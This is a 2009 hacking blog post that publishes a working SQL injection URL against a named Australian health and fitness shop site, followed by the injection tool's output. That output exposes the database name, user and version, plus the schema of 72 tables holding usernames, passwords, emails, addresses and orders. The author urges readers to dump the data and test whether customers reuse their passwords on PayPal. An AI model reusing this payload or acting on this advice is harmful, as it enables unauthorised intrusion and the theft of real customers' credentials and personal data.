viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, February 3, 2009

[SQLi] http://www.healthfitness.com.au

2:02 PM Posted by viperfx07 No comments
Tools: schemafuzz.py v5.0 mod by me
Advantage: Use it wisely. Dump it and check if their paypal password is their email password ^^

[+] URL:http://www.healthfitness.com.au/shop/product.php?p_id=56+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
[+] Evasion Used: "+" "--"
[+] 13:29:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: db60028b
User: us60028a@localhost
Version: 5.0.19-standard
[+] Showing Tables & Columns from database "db60028b"
[+] Number of Tables: 72

[Database]: db60028b
[Table: Columns]
[0]ahfa_disallow: id,username
[1]ahfa_f_category: cate_id,cate_title,cate_order
[2]ahfa_f_forum: forum_id,cate_id,forum_title,forum_desc,forum_order,forum_lock,last_post
[3]ahfa_f_post: post_id,topic_id,forum_id,userid,username,post_ip,post_added,post_edited,post_subject,post_text,topic
[4]ahfa_f_topic: topic_id,forum_id,topic_title,topic_poster,topic_views,topic_replies,last_post,topic_lock,topic_moved_id
[5]ahfa_f_topic_watch: topic_id,userid
[6]ahfa_forumauth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[7]ahfa_forumbanlist: ban_id,ban_userid,ban_ip,ban_email
[8]ahfa_forumcategories: cat_id,cat_title,cat_order
[9]ahfa_forumconfig: config_name,config_value
[10]ahfa_forumconfirm: confirm_id,session_id,code
[11]ahfa_forumdisallow: disallow_id,disallow_username
[12]ahfa_forumforum_prune: prune_id,forum_id,prune_days,prune_freq
[13]ahfa_forumforums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[14]ahfa_forumgroups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[15]ahfa_forumposts: post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[16]ahfa_forumposts_text: post_id,bbcode_uid,post_subject,post_text
[17]ahfa_forumprivmsgs: privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[18]ahfa_forumprivmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[19]ahfa_forumranks: rank_id,rank_title,rank_min,rank_special,rank_image
[20]ahfa_forumsearch_results: search_id,session_id,search_time,search_array
[21]ahfa_forumsearch_wordlist: word_text,word_id,word_common
[22]ahfa_forumsearch_wordmatch: post_id,word_id,title_match
[23]ahfa_forumsessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[24]ahfa_forumsessions_keys: key_id,user_id,last_ip,last_login
[25]ahfa_forumsmilies: smilies_id,code,smile_url,emoticon
[26]ahfa_forumthemes: themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[27]ahfa_forumthemes_name: themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[28]ahfa_forumtopics: topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_first_post_id,topic_last_post_id,topic_moved_id
[29]ahfa_forumtopics_watch: topic_id,user_id,notify_status
[30]ahfa_forumuser_group: group_id,user_id,user_pending
[31]ahfa_forumusers: user_id,user_active,username,user_password,user_session_time,user_session_page,user_lastvisit,user_regdate,user_level,user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_login_tries,user_last_login_try,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,user_email,user_icq,user_website,user_from,user_sig,user_sig_bbcode_uid,user_aim,user_yim,user_msnm,user_occ,user_interests,user_actkey,user_newpasswd
[32]ahfa_forumvote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[33]ahfa_forumvote_results: vote_id,vote_option_id,vote_option_text,vote_result
[34]ahfa_forumvote_voters: vote_id,vote_user_id,vote_user_ip
[35]ahfa_forumwords: word_id,word,replacement
[36]ahfa_s_brand: brand_id,brand
[37]ahfa_s_category: cate_id,cate_title,cate_order,html_title,keywords,description,cate_lock
[38]ahfa_s_order: order_id,userid,personal,added,total,billing,delivery,items,trans_id,processed
[39]ahfa_s_postage: postage_id,postage
[40]ahfa_s_product: product_id,subcate_id,cate_id,brand_id,product_title,caption,product_desc,html_title,keywords,description,product_price,gst,rrp,product_qty,product_lock,discount,image,added,sold,link,postage1,postage2,supplier_id
[41]ahfa_s_subcate: subcate_id,cate_id,subcate_title,subcate_desc,subcate_order,html_title,keywords,description,subcate_lock
[42]ahfa_s_supplier: supplier_id,supplier,supplier_email
[43]ahfa_s_temp: order_id,uid,np_details,nb_details,nd_details,my_cart
[44]ahfa_user: userid,username,password,firstname,lastname,signature,email,contact,age,gender,height,weight,marketing,addr1,addr2,city,state,postcode,country,p_addr1,p_addr2,p_city,p_state,p_postcode,p_country,type,active,banned,added,edited,visited,posts,orders,viewed,ordered,activation_code
[45]ahfa_words: word_id,word,replacement
[46]hfc: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,DateChanged,DateChangedU,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions,DirectoryType,CategoryBusiness,ServiceCategory,CityBusiness
[47]hfc_exp: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions
[48]hfc_freelist: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable
[49]hfc_freelist_business: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions,DirectoryType,CategoryBusiness,ServiceCategory,CityBusiness
[50]hfc_freelist_test: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable
[51]hfc_leads: id,userid,action,dateadded,dateviewed,firstname,lastname,email,phone,addr1,addr2,state,postcode,comment,alert
[52]hfc_standard: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink
[53]hfc_standard_offer: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions
[54]hfc_standard_offer_golive: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions
[55]hfc_temp: id,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink
[56]lms: id,firstname,lastname,email,phone,centre,password,dateadded
[57]mgcc_events: event_id,type,date,event,desc,link
[58]mgcc_results: result_id,type,month,year,event,desc,link
[59]newsletter: userid,FirstName,LastName,Email1,Addr1,Addr2,State,Zip,Phone1,Mobile,Date
[60]old_stats: userid,timestamp,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[61]stats: userid,timestamp,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[62]stats06b: id,userid,browser,ip,recieved,month,timestamp,Category,City,Suburb,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[63]stats07b: id,userid,browser,ip,recieved,month,timestamp,Category,City,Suburb,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[64]stats_b: id,userid,browser,ip,recieved,month,timestamp,Category,City,Suburb,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[65]stats_type: id,type
[66]tt_class: id,class_id,venue_id,client_id,type_id,instructor_id,duration,day,time,description,note
[67]tt_class_old: class_id,venue_id,type_id,instructor_id,duration,mon,tue,wed,thu,fri,sat,sun,logo,description,desc_mon,desc_tue,desc_wed,desc_thu,desc_fri,desc_sat,desc_sun
[68]tt_client: client_id,client,logo,bg_c,bg_i,bg_r,tb_b_w,tb_b_c,tb_hd_bg_c,tb_hd_bg_i,tb_hd_bg_r,tb_hd_f_c,tb_cls_bg_c,tb_cls_f_c,tb_wd_bg_c,tb_wd_f_c,tb_t_bg_c,tb_t_f_c,tb_empty_c,tb_cl_bg_c,tb_cl_f_c,tb_uc_f_c,username,password,date_added,date_changed
[69]tt_instructor: instructor_id,firstname,surname,client_id,description
[70]tt_type: type_id,type,client_id,description,intensity,logo
[71]tt_venue: venue_id,client_id,venue,interval,date_added,date_changed,addr1,addr2,city,state,int_state,postcode,country,email,phone,fax,url,logo

[-] [13:43:36]
[-] Total URL Requests 1016
[-] Done

0 comments:

Post a Comment